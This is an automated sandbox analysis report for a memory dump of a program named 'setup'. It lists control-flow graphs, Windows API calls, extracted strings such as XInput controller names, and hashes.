                                                                                                    control_flow_graph 804 248ad0-248add 805 248cf7-248cfe 804->805 806 248ae3-248aeb 804->806 807 248d00-248d22 805->807 808 248d33-248d39 805->808 809 248aed-248af4 806->809 812 248d28-248d2d 807->812 810 248af6-248afd 809->810 811 248b03-248b0a 809->811 810->811 813 248d50-248d56 810->813 814 248b0c-248b13 811->814 815 248b19-248b20 811->815 812->808 816 248e62-248e6a 812->816 813->811 817 248d5c 813->817 814->815 818 248d40-248d46 814->818 819 248b30-248b38 815->819 820 248b22-248b2a 815->820 821 248e71 call 23f1d0 816->821 823 248ceb-248cf1 817->823 818->815 822 248d4c 818->822 825 248b47-248b4e 819->825 826 248b3a-248b41 819->826 820->819 824 248d60-248d66 820->824 829 248e76-248e7c 821->829 822->823 823->805 823->809 824->819 830 248d6c 824->830 827 248b50-248b57 825->827 828 248b5d-248b64 825->828 826->825 831 248d71-248d77 826->831 827->828 832 248d82-248d88 827->832 833 248b66-248b6d 828->833 834 248b73-248b7a 828->834 830->823 831->825 835 248d7d 831->835 832->828 836 248d8e 832->836 833->834 837 248d93-248d99 833->837 838 248b7c-248b84 834->838 839 248b8a-248b92 834->839 835->823 836->823 837->834 840 248d9f 837->840 838->839 841 248db5-248dbb 838->841 842 248b94-248b9b 839->842 843 248ba1-248ba8 839->843 840->823 841->839 844 248dc1 841->844 842->843 845 248da4-248daa 842->845 846 248bb7-248bbe 843->846 847 248baa-248bb1 843->847 844->823 845->843 848 248db0 845->848 850 248bc0-248bc7 846->850 851 248bcd-248bd4 846->851 847->846 849 248dd0-248dd6 847->849 848->823 849->846 852 248ddc 849->852 850->851 853 248de1-248de7 850->853 854 248be4-248bec 851->854 855 248bd6-248bde 851->855 852->823 853->851 856 248ded 853->856 858 248bee-248bf5 854->858 859 248bfb-248c02 854->859 855->854 857 248e03-248e09 855->857 856->823 857->854 862 248e0f 857->862 858->859 863 248df2-248df8 858->863 860 248c04-248c0b 859->860 861 248c11-248c18 859->861 860->861 864 248e14-248e1a 860->864 865 248c27-248c2e 861->865 866 248c1a-248c21 861->866 862->823 863->859 867 248dfe 863->867 864->861 868 248e20 864->868 870 248c30-248c38 865->870 871 248c3e-248c46 865->871 866->865 869 248e25-248e2b 866->869 867->823 868->823 869->865 872 248e31 869->872 870->871 873 248e40-248e46 870->873 874 248c55-248c61 871->874 875 248c48-248c4f 871->875 872->823 873->871 876 248e4c 873->876 879 248c6a-248c6f 874->879 875->874 877 248e51-248e57 875->877 876->823 877->874 878 248e5d 877->878 878->823 879->823 880 248c71-248c8f sprintf 879->880 881 248c95-248c9a 880->881 882 248ef0-248ef5 880->882 881->882 883 248ed0-248edf 881->883 884 248e80-248e85 881->884 885 248e90-248e95 881->885 886 248ea0-248ea5 881->886 887 248eb0-248eb5 881->887 888 248ec0-248ec5 881->888 889 248ca1-248ca9 881->889 883->882 890 248cb0-248ccc 884->890 885->890 886->890 887->890 888->890 889->890 891 248ccf call 240030 890->891 892 248cd4-248cd6 891->892 892->823 893 248cd8-248ce6 call 23ff50 892->893 893->823
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sprintf
                                                                                                    • String ID: 78696e707574%02x000000000000000000$Failed to enumerate DirectInput8 devices$Unknown XInput Device$Wireless Xbox Controller$XInput Arcade Stick$XInput Dance Pad$XInput Drum Kit$XInput Flight Stick$XInput Guitar$XInput Wheel$Xbox Controller
                                                                                                    • API String ID: 590974362-4133938288
                                                                                                    • Opcode ID: 522f71128b411a35796e9c7edde16ae044ab073adb110b10cc18e4733766137e
                                                                                                    • Instruction ID: 23e03d13ef7c3ebfd7951028b18dcc736f1234fcb9992b59a5005823505d7647
                                                                                                    • Opcode Fuzzy Hash: 522f71128b411a35796e9c7edde16ae044ab073adb110b10cc18e4733766137e
                                                                                                    • Instruction Fuzzy Hash: 9B911979735202CBDB2C9F29E88063A73A4FB52748B14443FE945C7251DF70D868DB6A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 895 247f60-247f6a 896 247f6c-247f75 UnregisterDeviceNotification 895->896 897 247f78-247f7f 895->897 896->897 898 247f81-247f8a DestroyWindow 897->898 899 247f8d-247fd5 call 24cba0 SystemParametersInfoW free * 2 call 250b50 897->899 898->899 903 247fda-247feb call 251e60 call 248a50 899->903 908 247fed-247ff6 FreeLibrary 903->908 909 247ff9-248000 903->909 908->909 910 248002-24800b FreeLibrary 909->910 911 24800e-248015 909->911 910->911 912 248017-248020 FreeLibrary 911->912 913 248023-24802a 911->913 912->913 914 24802c-248035 FreeLibrary 913->914 915 248038-24803f 913->915 914->915 916 248041-24804a FreeLibrary 915->916 917 24804d-248054 915->917 916->917 918 248056-24805f FreeLibrary 917->918 919 248062-248069 917->919 918->919 920 248077-24807a 919->920 921 24806b-248074 FreeLibrary 919->921 921->920
                                                                                                    APIs
                                                                                                    • UnregisterDeviceNotification.USER32 ref: 00247F6F
                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,0023F094,-00000004,00000001,0044EB60,0023F700,?,?,?,?,0139290C), ref: 00247F84
                                                                                                    • SystemParametersInfoW.USER32 ref: 00247FB2
                                                                                                    • free.MSVCRT ref: 00247FC3
                                                                                                    • free.MSVCRT ref: 00247FD0
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0023F094,-00000004,00000001,0044EB60,0023F700), ref: 00247FF0
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0023F094,-00000004,00000001,0044EB60,0023F700), ref: 00248005
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0023F094,-00000004,00000001,0044EB60,0023F700), ref: 0024801A
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0023F094,-00000004,00000001,0044EB60,0023F700), ref: 0024802F
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0023F094,-00000004,00000001,0044EB60,0023F700), ref: 00248044
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0023F094,-00000004,00000001,0044EB60,0023F700), ref: 00248059
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0023F094,-00000004,00000001,0044EB60,0023F700), ref: 0024806E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary$free$DestroyDeviceInfoNotificationParametersSystemUnregisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1825173338-0
                                                                                                    • Opcode ID: 8184ef53c6d6bc164f7fc9e5d038d3e10332d94a6d94295a9d5783755da100c1
                                                                                                    • Instruction ID: 5dc150ef136417e8375d46c73e56ad64c2eb33cef2dcd2fbd9ce582c710143ea
                                                                                                    • Opcode Fuzzy Hash: 8184ef53c6d6bc164f7fc9e5d038d3e10332d94a6d94295a9d5783755da100c1
                                                                                                    • Instruction Fuzzy Hash: 6E31E9B5A247018FDB10BFB8E98961D7BF0AF01342F054939E885C7222EF74D458CB5A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 922 1c2680-1c26d3 FormatMessageW 923 1c26d5-1c26dc 922->923 924 1c26e0-1c2732 FormatMessageW LocalFree 922->924 924->923 925 1c2734-1c2748 malloc 924->925 926 1c274a-1c275f memcpy 925->926 927 1c2764-1c279b LocalFree MessageBoxW 925->927 926->927
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$FormatFreeLocal$mallocmemcpy
                                                                                                    • String ID: %1%2$Error
                                                                                                    • API String ID: 83372426-1004375922
                                                                                                    • Opcode ID: b4c6874506d11a3a29e24c4417b7493feaac23c159b13cbb0445c7d531985e47
                                                                                                    • Instruction ID: 20c22b7a94a1f15d2748ef43ed832b0dc751aefcc4e760c6a6706cb6c3c33c20
                                                                                                    • Opcode Fuzzy Hash: b4c6874506d11a3a29e24c4417b7493feaac23c159b13cbb0445c7d531985e47
                                                                                                    • Instruction Fuzzy Hash: F131C0B55083059FD300EF69D58975BBBE4AF88358F00892EE88897251E7B8D6488F97

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID: what(): $N2
                                                                                                    • API String ID: 2803490479-1011025255
                                                                                                    • Opcode ID: a6edf11302ab5ace98815d098cd510e3b748efbc3f17bd77a85b28a3be136e42
                                                                                                    • Instruction ID: b30964f256a6d79c480cf6f0c5fd418e49f544fb3f9c1e2039d90ec1707adb89
                                                                                                    • Opcode Fuzzy Hash: a6edf11302ab5ace98815d098cd510e3b748efbc3f17bd77a85b28a3be136e42
                                                                                                    • Instruction Fuzzy Hash: 5011D7B45183219FD712BFB8D58672EBAE4AF84744F12881DE4C88F242DBB885809F53

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 987 1e69a0-1e69a6 988 1e69ac-1e69b6 987->988 988->988 989 1e69b8-1e69db CoInitializeEx 988->989 990 1e69dd-1e6a20 MessageBoxW 989->990 991 1e6a28-1e6a3c SHBrowseForFolderW 989->991 992 1e6a3e-1e6a68 SHGetPathFromIDListW CoTaskMemFree 991->992 993 1e6a80-1e6a91 991->993 997 1e6a6b-1e6a7b CoUninitialize 992->997 993->997
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeMessage
                                                                                                    • String ID: A$select_path_thread: CoInitializeEx.
                                                                                                    • API String ID: 2132078583-1076498671
                                                                                                    • Opcode ID: fb590c21e95d6d3a8d54b7b4d9e0887a77e37a667af9180cd1e5ae14de4ab541
                                                                                                    • Instruction ID: 3c4f17b9184acde33c1e6a71f11737ac56f7a78642ff37c65a639b34c1b52673
                                                                                                    • Opcode Fuzzy Hash: fb590c21e95d6d3a8d54b7b4d9e0887a77e37a667af9180cd1e5ae14de4ab541
                                                                                                    • Instruction Fuzzy Hash: 5F21F9B14087008FE314AF68D94C35EBFE0BF80346F41882DE48987216D774C498CB5B

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 998 1c64f0-1c6519 call 1c2090 1001 1c656e-1c657e 998->1001 1002 1c651b-1c652b PathRemoveFileSpecA 998->1002 1003 1c6586-1c659d MessageBoxW exit 1001->1003 1004 1c65bc-1c65d4 1002->1004 1005 1c6531-1c6553 call 1c5ef0 1002->1005 1007 1c65a2-1c65ba 1003->1007 1004->1003 1005->1007 1009 1c6555-1c656d free call 1c2440 1005->1009 1007->1003
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileMessagePathRemoveSpecexitfree
                                                                                                    • String ID: ,InitModulePath: astrtokn$Error$ModulePath: PathRemoveFileSpecA$ModulePath: swprintf
                                                                                                    • API String ID: 424394031-685578126
                                                                                                    • Opcode ID: c24c4594aaed83fefdc0c68be373c62048a6e1f6d5d180ba449a8421ee405e59
                                                                                                    • Instruction ID: 3e088274abd9f7a8bc7d9149433edffbb01d049c1ed46889136252fa4d481098
                                                                                                    • Opcode Fuzzy Hash: c24c4594aaed83fefdc0c68be373c62048a6e1f6d5d180ba449a8421ee405e59
                                                                                                    • Instruction Fuzzy Hash: 4811B0B4509700AFD711AF65D64975EBAE0AF90384F12C81CE4C94B269D7B9C498DF83
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00276BFB
                                                                                                    • CreateEventA.KERNEL32 ref: 00276C23
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000004,774CDF20,002776AD), ref: 00276C65
                                                                                                    • GetCurrentThread.KERNEL32 ref: 00276C69
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000004,774CDF20,002776AD), ref: 00276C71
                                                                                                    • DuplicateHandle.KERNELBASE ref: 00276C9D
                                                                                                    • GetThreadPriority.KERNEL32 ref: 00276CB4
                                                                                                    • TlsSetValue.KERNEL32 ref: 00276CE0
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,00000004,774CDF20,002776AD), ref: 003329A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$Thread$Process$CreateDuplicateEventHandlePriorityValueabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 1404136710-0
                                                                                                    • Opcode ID: e6a357c7082ab704009b67f15966134dedd356121854a996969df6b48e967f64
                                                                                                    • Instruction ID: 955e70e79654ed9c19c8105f34ac7c2dc002c930c639b44e00cb0eb917dcb28a
                                                                                                    • Opcode Fuzzy Hash: e6a357c7082ab704009b67f15966134dedd356121854a996969df6b48e967f64
                                                                                                    • Instruction Fuzzy Hash: 91315AB15043018FD710AF79E98931ABFE4FB44315F00866EE8888B396E774C458CFA2
                                                                                                    APIs
                                                                                                    • RemovePropW.USER32 ref: 0024D394
                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,00246101,?,?,-00000004,0044EB60,0023EFEB,-00000004,00000001,0044EB60), ref: 0024D3A6
                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00246101,?,?,-00000004,0044EB60,0023EFEB,-00000004,00000001,0044EB60,0023F700), ref: 0024D3C6
                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00246101,?,?,-00000004,0044EB60,0023EFEB,-00000004,00000001,0044EB60,0023F700), ref: 0024D3DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
